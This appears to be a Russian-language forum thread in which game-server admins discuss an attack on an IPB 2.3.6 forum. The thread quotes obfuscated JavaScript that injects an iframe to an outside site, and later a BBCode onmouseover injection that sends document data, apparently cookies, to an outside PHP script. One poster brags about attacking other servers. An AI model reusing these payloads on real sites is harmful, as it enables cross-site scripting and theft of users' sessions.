Взлом сервера через iframe

Доброе время суток! Хочу спросить,может кто-то сталкивался с таким видом взлома сервера. Злоумышленник регестрируеться на форуме, и в подпись вставляет картинку с прикрытым код шела. Выглядит примерно так:

Код:

document.write(\x22\x3C/iframe\x20src=http://lovel2.h1.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=yes\x3E\x3C/iframe\x3E\x22);document.close()}";eval(lol);


Кто может посоветовать как уберечь сервер от таких видов слития базы.

dashuk пишет:Доброе время суток! Хочу спросить,может кто-то сталкивался с таким видом взлома сервера. Злоумышленник регестрируеться на форуме, и в подпись вставляет картинку с прикрытым код шела. Выглядит примерно так:

Код:

document.write(\x22\x3C/iframe\x20src=http://lovel2.h1.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=yes\x3E\x3C/iframe\x3E\x22);document.close()}";eval(lol);


Кто может посоветовать как уберечь сервер от таких видов слития базы.

какой форум используешь?
Просто на IPB 3.0 помоему это исправили, да и на 2.3.6

IPB 2.3.6

dashuk пишет:IPB 2.3.6

так скачай доработки есть по этому поводу...

ну дык, сам так нубосерверам жизнь порчу, нефиг на халявные сервера, ставить халявные обвязки и халявные форумы и собирать донат )) надо постараца и сделать нормальный проект =Р

Liiion911 пишет:ну дык, сам так нубосерверам жизнь порчу, нефиг на халявные сервера, ставить халявные обвязки и халявные форумы и собирать донат )) надо постараца и сделать нормальный проект =Р

прочу так сказать наводишь да?

Liiion911 пишет:ну дык, сам так нубосерверам жизнь порчу, нефиг на халявные сервера, ставить халявные обвязки и халявные форумы и собирать донат )) надо постараца и сделать нормальный проект =Р

Увожаемый Liiion911 Вы сказали про халявные сервера от сказки или в вообщем ? Кроде этот форум Про сказку !?
Если Вас не затруднит Скинте ссылочку на Ваш сервер очень дети мои хочють взгянуть на Ваш проект !!!
На нашем сервере тоже всё халявное но ведь у сказке нету за денюшки то - или всётаки Вам удалося у него купить чтонить за денюшку !


С уважением к Вам Все нубы у каторых всё халявное и каторые хотят стать такими как ВЫ !!!

smolnik0ff пишет:

Liiion911 пишет:ну дык, сам так нубосерверам жизнь порчу, нефиг на халявные сервера, ставить халявные обвязки и халявные форумы и собирать донат )) надо постараца и сделать нормальный проект =Р

Увожаемый Liiion911 Вы сказали про халявные сервера от сказки или в вообщем ? Кроде этот форум Про сказку !?
Если Вас не затруднит Скинте ссылочку на Ваш сервер очень дети мои хочють взгянуть на Ваш проект !!!
На нашем сервере тоже всё халявное но ведь у сказке нету за денюшки то - или всётаки Вам удалося у него купить чтонить за денюшку !


С уважением к Вам Все нубы у каторых всё халявное и каторые хотят стать такими как ВЫ !!!

Извините, а хостинг и машина тоже халявны?
Зачем создавать свой проект если можно протить чужие

smolnik0ff, а еще у меня нет сервера. т.к. я не могу пока вкладывать.
И еслиб был сервер, то я бы врядли разводил бешеный донат имея в качестве сборки - сказку, в качестве сайта нулленый ДЛЕ или стресс веб с шелами, а в качестве форума, нулленый пхпББ или вБуллетин )

а особенно улыбнуло что этот код просто открывает ифрейм. и если уж поставили движок на форуме, то настройте ево как надо и по таким вопросам лучше писать в багрепорт или саппорт движка форума а не сервера )))

А с чего Вы взяли что у меня есть донат?.Можно подумать что все кто открывает сервер, открывает из за доната? Бред! на l2top.ru посмотрите там много серверов есть без доната! Потому и пользуюсь всем халявным чтоб не делать доната только за хостинг плачу ну там копейки. Да и стрес веб можно почистить от шелов не так сложно и в сети есть много мануалов как чистить.

Liiion911 пишет:
а особенно улыбнуло что этот код просто открывает ифрейм. и если уж поставили движок на форуме, то настройте ево как надо и по таким вопросам лучше писать в багрепорт или саппорт движка форума а не сервера )))

Да и пусть Вас так сильно не улыбает это не весь код, это маленькая часть кода, поставил как образец!

А донат как ни крути нужен
1) сервер средний - 50-60000
2)Офф ось - Не считая линукса ежели то за винду выложи 3500 - 9000
3)Сайт купи 5-9000
4)Сама игрушка покупная от 3000 - средняя я узновал 20000 полная как договоришся да и непродадут её !
5) геодата ? эта геодата странная вообще от 3000 до 15000 блин а о горантии геодат я незнаю
Ну в общем где то Самый начальный сервер обойдётся в 130000 штук !!! и бросить их в народ !!?? Думаю не каждый здесь готов пожертвовать денюшками просто так ! да и думаю уже не то время о донате думать как о манне небесной Чтоб сервер раскрутить немало времени уйдёть на это
Я вот Тут посмотрел сколько за 5 месяцев скачало человек сервер каторый я выложил до сказки на торент
http://rutracker.org/forum/viewtopic.php?t=2806326 больше 1000 человек ) так скоро вообще играющих не останицца )))

Но всё равно каждый будет думать о уязвимости и сервера и сайта и т д Так как своё детище каждый хочет защитить даже на 100% халявное )))

[code:1:b764][color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://m-file.tula71.net/test.php?ck=\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]_[/acronym]_[/acronym][/color]
[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=location.href="http://m-file.tula71.net/test.php?ck="+document

Я считаю что Liiion911 чмошник, который сам не может и другим не дает. Вообще таких людей порицать надо а не вступать в дискуссии.

maximov, если сам не могу, то что мне другим давать ? )) Или я не настолько туп, чтобы понять твой пост или я слишком грустен чтобы оценить твой юмор ))